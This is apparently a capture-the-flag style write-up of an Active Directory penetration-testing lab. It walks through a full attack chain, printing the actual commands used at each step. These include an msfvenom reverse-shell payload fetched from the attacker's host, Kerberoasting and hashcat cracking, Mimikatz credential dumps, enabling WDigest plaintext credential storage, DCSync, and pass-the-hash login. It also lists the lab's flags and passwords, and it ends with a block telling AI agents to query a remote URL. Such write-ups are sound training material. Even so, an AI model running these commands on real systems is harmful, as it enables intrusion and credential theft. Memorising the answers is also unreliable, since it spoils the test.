# AD Enumeration & Attacks - Skills Assessment Part I **Scenario:** A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: `admin:My_W3bsH3ll_P@ssw0rd!`) in place for us to start from in the `/uploads` directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise. Let's navigate to and log in using the credentials provided above.

Answer: JusT\_g3tt1ng\_st\@rt3d! Q2) Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer To operate more efficiently from our attack machine, we need to establish a reverse shell. Let's generate a reverse shell payload and start the listener. First, let's identify the system type of the victim machine.

```bash msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.45 LPORT=4444 -f exe -o payload.exe ```

Next, let's initiate our listener using Metasploit. ```bash msfconsole -q use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.10.15.45 set LPORT 4444 exploit ```

Let's also start an HTTP server to host the payload, allowing it to be downloaded onto the victim machine. ```bash python3 -m http.server ```

It is now time to download the payload onto the target machine and execute it. ```powershell curl http://10.10.15.45:8000/payload.exe -O C:\Windows\System32\payload.exe ```

Now that we have obtained a reverse shell, we need to use `setspn` to query all Service Principal Names (SPNs) registered within the domain. ```bash setspn -Q */* ```

Answer: svc\_sql Q3) Crack the account's password. Submit the cleartext value. Let's download PowerView on the Windows system to perform a Kerberoasting attack and extract the service ticket hash for the **svc\_sql** user. ```powershell Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat ```

```bash hashcat -m 13100 svcsql_tgs /usr/share/wordlists/rockyou.txt ```

Answer: lucky7 Q4) Submit the contents of the flag.txt file on the Administrator desktop on MS01 ```bash net use \\MS01\c$ /user:INLANEFREIGHT.LOCAL\svc_sql lucky7 type \\ms01\c$\Users\Administrator\Desktop\flag.txt ```

Answer: spn$*r0ast1ng\_on*@n\_0p3n\_f1re Q5) Find cleartext credentials for another domain user. Submit the username as your answer. Next, we need to connect to **MS01.INLANEFREIGHT.LOCAL** using the credentials we previously obtained. Since we do not have direct access to this machine, we will first set up a port forwarding rule to enable RDP access from our attacker machine.

Here is the IP address of the MS01 computer, which will be used as the connection IP address. ```bash netsh.exe interface portproxy add v4tov4 listenport=8888 listenaddress=10.129.253.79 connectport=3389 connectaddress=172.16.6.50 ```

Let's initiate a connection using RDP. ```bash xfreerdp /u:svc_sql /p:lucky7 /v:10.129.253.79:8888 /dynamic-resolution /drive:Shared,//home/htb-ac-1224655/ ```

I used the drive option to ensure convenient access to our tools.

Now, let's use Mimikatz to retrieve the cleartext password. ```powershell .\mimikatz.exe privilege::debug sekurlsa::logonpasswords ```

I found a blank password here, which indicates that WDigest needs to be enabled. WDigest is a Windows authentication protocol that stores user credentials in plaintext within memory, making them accessible to tools like Mimikatz for extraction. Answer: tpetty Q6) Submit this user's cleartext password. After this we will need to restart the computer ```powershell reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 shutdown.exe /r /t 0 /f ```

Now that we’ve logged in again, let’s repeat the same steps we performed using Mimikatz and review the results.

Answer: Sup3rS3cur3D0m\@inU2eR Q7) What attack can this user perform? Let's enumerate the user's access control list to determine their permissions and capabilities.

Import-Module .\PowerView.ps1
$sid = Convert-NameToSid tpetty
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

Answer: DCSync Q8) Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01 We will now use Mimikatz to perform a DCSync attack to retrieve the hash of the Administrator account. Before proceeding, we need to run the command as the user **tpetty**. ```powershell runas /user:INLANEFREIGHT\tpetty powershell.exe privilege::debug lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator ```

We have obtained the administrator's hash, which can be used directly for authentication. However, before proceeding, we need to verify which ports are open on the domain controller at `172.16.6.3`. ```bash run autoroute -s 172.16.6.3 run autoroute -p ```

It instructs Metasploit to route traffic destined for the `172.16.6.3` subnet through the currently compromised host via the Meterpreter session. Next, let's conduct a port scan to identify the open ports. ```bash use auxiliary/scanner/portscan/tcp set rhosts 172.16.6.3 exploit ``` I discovered that port 5985 is open, which is the default port for WinRM over HTTP. However, before connecting from our attacking machine, we need to set up port forwarding. ```bash portfwd add -l 6666 -p 5985 -r 172.16.6.3 ```

Next, we will use `Evil-WinRM` from the attacking machine to establish a connection to the domain controller using the provided credentials. ```bash evil-winrm -i 10.10.15.16 --port 6666 -u administrator -H 27dedb1dab4d8545c6e1c66fba077da0 ```

Answer: r3plicat1on\_m\@st3r! --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://faresbltagy.gitbook.io/footprintinglabs/active-directory-enumeration-and-attacks/ad-enumeration-and-attacks-skills-assessment-part-i.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.